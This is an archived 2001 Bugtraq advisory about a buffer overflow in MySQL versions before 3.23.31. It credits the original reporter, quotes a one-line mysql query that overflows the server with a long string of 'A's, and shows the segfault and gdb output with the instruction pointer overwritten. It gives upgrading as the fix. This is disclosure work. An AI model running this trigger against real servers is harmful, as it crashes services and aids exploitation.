Bugtraq mailing list archives
Buffer overflow in MySQL < 3.23.31
From: Nicolas GREGOIRE <nicolas.gregoire () 7THZONE COM>
Date: Thu, 18 Jan 2001 18:44:31 +0100
Hi, all versions of MySQL < 3.23.31 have a buffer-overflow which crashs the server and which seems to be exploitable (ie. 4141414 in eip) Problem : An attacker could gain mysqld privileges (gaining access to all the databases) Requirements : You need a valid login/password to exploit this Solution : Upgrade to 3.23.31 Proof-of-concept code : None Credits : I'm not the discoverer of this bug The first public report was made by tharbad () kaotik org via the MySQL mailing-list See the following mails for details Regards, Nicob Here the original post to the MySQL mailing-list : ================================================== On Jan 12, Jo?o Gouveia wrote:
Hi, I believe i've found a problem in MySql. Here are some test's i've made in 3.22.27 x86( also tested on v3.22.32 - latest stable, although i didn't debug it, just tested to see if crashes ).Confirmed up to latest 3.23
On one terminal: <quote> spike:/var/mysql # /sbin/init.d/mysql start Starting service MySQL. Starting mysqld daemon with databases from /var/mysql done spike:/var/mysql # </quote> On the other terminal: <quote> jroberto@spike:~ > mysql -p -e 'select a.'`perl -e'printf("A"x130)'`'.b' Enter password: (hanged..^C) </quote> On the first terminal i got: <quote> spike:/var/mysql # /usr/bin/safe_mysqld: line 149: 15557 Segmentation fault nohup $ledir/mysqld --basedir=$MY_BASEDIR_VERSION --datadir=$DATADIR --skip-lockin g "$@" >>$err_log 2>&1> Number of processes running now: 0 mysqld restarted on Fri Jan 12 07:10:54 WET 2001 mysqld daemon ended </quote> gdb shows the following: <quote> (gdb) run Starting program: /usr/sbin/mysqld [New Thread 16897 (manager thread)] [New Thread 16891 (initial thread)] [New Thread 16898] /usr/sbin/mysqld: ready for connections [New Thread 16916] [Switching to Thread 16916] Program received signal SIGSEGV, Segmentation fault. 0x41414141 in ?? () (gdb) info all-registers eax 0x1 1 ecx 0x68 104 edx 0x8166947 135686471 ebx 0x41414141 1094795585 esp 0xbf5ff408 0xbf5ff408 ebp 0x41414141 0x41414141 esi 0x41414141 1094795585 edi 0x0 0 eip 0x41414141 0x41414141 eflags 0x10246 66118 cs 0x23 35 ss 0x2b 43 ds 0x2b 43 es 0x2b 43 fs 0x0 0 gs 0x0 0 (gdb) </quote> looks like a tipical overflow to me. Please reply asap, at least to tell me i'me not seeing things. :-)> Best regards, Joao Gouveia aka Tharbad. tharbad () kaotik org
Here the reponse to a email I send today to the MySQL list : ============================================================ Sergei Golubchik (MySQL team) wrote :
Hi! On Jan 18, Nicolas GREGOIRE wrote:Hi, Still not any info about the buffer-overflow discovered last week ? Shouldn't be fixed at the beginning of the week ? Please, dear MySQL team, give us info !! Regards, NicobFixed in latest release (3.23.31). Regards, Sergei
Here an part of the 3.23.30 to 3.23.31 diff : ============================================= +Changes in release 3.23.31 +-------------------------- + + * Fixed security bug in something (please upgrade if you are using a + earlier MySQL 3.23 version).
Current thread:
- Buffer overflow in MySQL < 3.23.31 Nicolas GREGOIRE (Jan 19)
- Re: Buffer overflow in MySQL < 3.23.31 Joao Gouveia (Jan 23)